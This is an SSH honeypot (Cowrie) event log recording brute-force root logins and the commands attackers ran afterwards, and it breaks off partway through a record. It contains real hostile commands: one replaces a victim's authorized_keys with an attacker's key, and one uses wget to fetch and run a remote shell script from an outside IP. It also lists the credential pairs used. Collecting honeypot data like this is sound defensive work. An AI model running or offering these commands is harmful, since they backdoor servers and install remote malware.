{"eventid":"cowrie.session.connect","src_ip":"134.199.225.42","src_port":33774,"dst_ip":"1.2.3.4","dst_port":22,"session":"c0a338da9cf5","protocol":"ssh","message":"New connection: 134.199.225.42:33774 (1.2.3.4:22) [session: c0a338da9cf5]","sensor":"my-vps","timestamp":"2025-08-26T06:19:39.170175Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T06:19:39.171184Z","src_ip":"134.199.225.42","session":"c0a338da9cf5"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T06:19:39.329366Z","src_ip":"134.199.225.42","session":"c0a338da9cf5"}
{"eventid":"cowrie.login.success","username":"root","password":"qweqwe123","message":"login attempt [root/qweqwe123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T06:19:40.001389Z","src_ip":"134.199.225.42","session":"c0a338da9cf5"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T06:19:40.381142Z","src_ip":"134.199.225.42","session":"c0a338da9cf5"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T06:19:40.381845Z","src_ip":"134.199.225.42","session":"c0a338da9cf5"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T06:19:40.383144Z","src_ip":"134.199.225.42","session":"c0a338da9cf5"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:19:40.542763Z","src_ip":"134.199.225.42","session":"c0a338da9cf5"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T06:19:40.876969Z","src_ip":"134.199.225.42","session":"c0a338da9cf5"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T06:19:40.877650Z","src_ip":"134.199.225.42","session":"c0a338da9cf5"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T06:19:41.038775Z","src_ip":"134.199.225.42","session":"c0a338da9cf5"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:19:41.039664Z","src_ip":"134.199.225.42","session":"c0a338da9cf5"}
{"eventid":"cowrie.session.connect","src_ip":"134.199.225.42","src_port":33788,"dst_ip":"1.2.3.4","dst_port":22,"session":"10a85b12b522","protocol":"ssh","message":"New connection: 134.199.225.42:33788 (1.2.3.4:22) [session: 10a85b12b522]","sensor":"my-vps","timestamp":"2025-08-26T06:19:41.196891Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T06:19:41.197712Z","src_ip":"134.199.225.42","session":"10a85b12b522"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T06:19:41.356248Z","src_ip":"134.199.225.42","session":"10a85b12b522"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T06:19:42.029599Z","src_ip":"134.199.225.42","session":"10a85b12b522"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:19:43.191640Z","src_ip":"134.199.225.42","session":"10a85b12b522"}
{"eventid":"cowrie.session.connect","src_ip":"134.199.225.42","src_port":33798,"dst_ip":"1.2.3.4","dst_port":22,"session":"06550584f643","protocol":"ssh","message":"New connection: 134.199.225.42:33798 (1.2.3.4:22) [session: 06550584f643]","sensor":"my-vps","timestamp":"2025-08-26T06:19:43.351280Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T06:19:43.351984Z","src_ip":"134.199.225.42","session":"06550584f643"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T06:19:43.511406Z","src_ip":"134.199.225.42","session":"06550584f643"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T06:19:44.191010Z","src_ip":"134.199.225.42","session":"06550584f643"}
{"eventid":"cowrie.session.closed","duration":"5.2","message":"Connection lost after 5.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:19:44.348659Z","src_ip":"134.199.225.42","session":"c0a338da9cf5"}
{"eventid":"cowrie.session.closed","duration":"1.0","message":"Connection lost after 1.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:19:44.351843Z","src_ip":"134.199.225.42","session":"06550584f643"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":39446,"dst_ip":"1.2.3.4","dst_port":22,"session":"0761b3e49287","protocol":"ssh","message":"New connection: 212.227.125.160:39446 (1.2.3.4:22) [session: 0761b3e49287]","sensor":"my-vps","timestamp":"2025-08-26T06:19:48.075145Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T06:19:48.126758Z","src_ip":"212.227.125.160","session":"0761b3e49287"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T06:19:48.132711Z","src_ip":"212.227.125.160","session":"0761b3e49287"}
{"eventid":"cowrie.login.success","username":"root","password":"admin","message":"login attempt [root/admin] succeeded","sensor":"my-vps","timestamp":"2025-08-26T06:19:48.822554Z","src_ip":"212.227.125.160","session":"0761b3e49287"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T06:19:48.977250Z","src_ip":"212.227.125.160","session":"0761b3e49287"}
{"eventid":"cowrie.command.input","input":"wget http://23.146.184.21/adb.sh; chmod 777 *; sh adb.sh x86","message":"CMD: wget http://23.146.184.21/adb.sh; chmod 777 *; sh adb.sh x86","sensor":"my-vps","timestamp":"2025-08-26T06:19:48.977956Z","src_ip":"212.227.125.160","session":"0761b3e49287"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/958e74ac463ee3e75e7731e9747ee99a246446506abef9b030bfa21e76109516","size":138,"shasum":"958e74ac463ee3e75e7731e9747ee99a246446506abef9b030bfa21e76109516","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/958e74ac463ee3e75e7731e9747ee99a246446506abef9b030bfa21e76109516 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:19:49.030235Z","src_ip":"212.227.125.160","session":"0761b3e49287"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:19:49.142155Z","src_ip":"212.227.125.160","session":"0761b3e49287"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41496,"dst_ip":"1.2.3.4","dst_port":22,"session":"3d898ed2aa8b","protocol":"ssh","message":"New connection: 212.227.235.229:41496 (1.2.3.4:22) [session: 3d898ed2aa8b]","sensor":"my-vps","timestamp":"2025-08-26T06:19:51.260251Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:19:51.261565Z","src_ip":"212.227.235.229","session":"3d898ed2aa8b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41861,"dst_ip":"1.2.3.4","dst_port":22,"session":"de8d49aafe0e","protocol":"ssh","message":"New connection: 212.227.235.229:41861 (1.2.3.4:22) [session: de8d49aafe0e]","sensor":"my-vps","timestamp":"2025-08-26T06:19:51.360635Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T06:19:51.361540Z","src_ip":"212.227.235.229","session":"de8d49aafe0e"}
{"eventid":"cowrie.client.kex","hassh":"6a77bbd6ef48d6a9959a47aa4a42a505","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 6a77bbd6ef48d6a9959a47aa4a42a505","sensor":"my-vps","timestamp":"2025-08-26T06:19:51.490140Z","src_ip":"212.227.235.229","session":"de8d49aafe0e"}
{"eventid":"cowrie.login.success","username":"root","password":"broadguam1","message":"login attempt [root/broadguam1] succeeded","sensor":"my-vps","timestamp":"2025-08-26T06:19:51.877273Z","src_ip":"212.227.235.229","session":"de8d49aafe0e"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"178.20.45.148","dst_port":80,"src_ip":"212.227.235.229","src_port":0,"message":"direct-tcp connection request to 178.20.45.148:80 from 0.0.0.0:0","sensor":"my-vps","timestamp":"2025-08-26T06:19:52.006860Z","session":"de8d49aafe0e"}
{"eventid":"cowrie.session.connect","src_ip":"134.199.225.42","src_port":60400,"dst_ip":"1.2.3.4","dst_port":22,"session":"f1e8daacfd9b","protocol":"ssh","message":"New connection: 134.199.225.42:60400 (1.2.3.4:22) [session: f1e8daacfd9b]","sensor":"my-vps","timestamp":"2025-08-26T06:20:41.584152Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T06:20:41.585050Z","src_ip":"134.199.225.42","session":"f1e8daacfd9b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T06:20:41.742609Z","src_ip":"134.199.225.42","session":"f1e8daacfd9b"}
{"eventid":"cowrie.login.success","username":"root","password":"123456qwe@","message":"login attempt [root/123456qwe@] succeeded","sensor":"my-vps","timestamp":"2025-08-26T06:20:42.413441Z","src_ip":"134.199.225.42","session":"f1e8daacfd9b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T06:20:42.746983Z","src_ip":"134.199.225.42","session":"f1e8daacfd9b"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T06:20:42.747679Z","src_ip":"134.199.225.42","session":"f1e8daacfd9b"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T06:20:42.748787Z","src_ip":"134.199.225.42","session":"f1e8daacfd9b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:20:42.908403Z","src_ip":"134.199.225.42","session":"f1e8daacfd9b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T06:20:43.332120Z","src_ip":"134.199.225.42","session":"f1e8daacfd9b"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T06:20:43.332812Z","src_ip":"134.199.225.42","session":"f1e8daacfd9b"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T06:20:43.492922Z","src_ip":"134.199.225.42","session":"f1e8daacfd9b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:20:43.493865Z","src_ip":"134.199.225.42","session":"f1e8daacfd9b"}
{"eventid":"cowrie.session.connect","src_ip":"134.199.225.42","src_port":60414,"dst_ip":"1.2.3.4","dst_port":22,"session":"7fa4a9692d7f","protocol":"ssh","message":"New connection: 134.199.225.42:60414 (1.2.3.4:22) [session: 7fa4a9692d7f]","sensor":"my-vps","timestamp":"2025-08-26T06:20:43.652985Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T06:20:43.654091Z","src_ip":"134.199.225.42","session":"7fa4a9692d7f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","s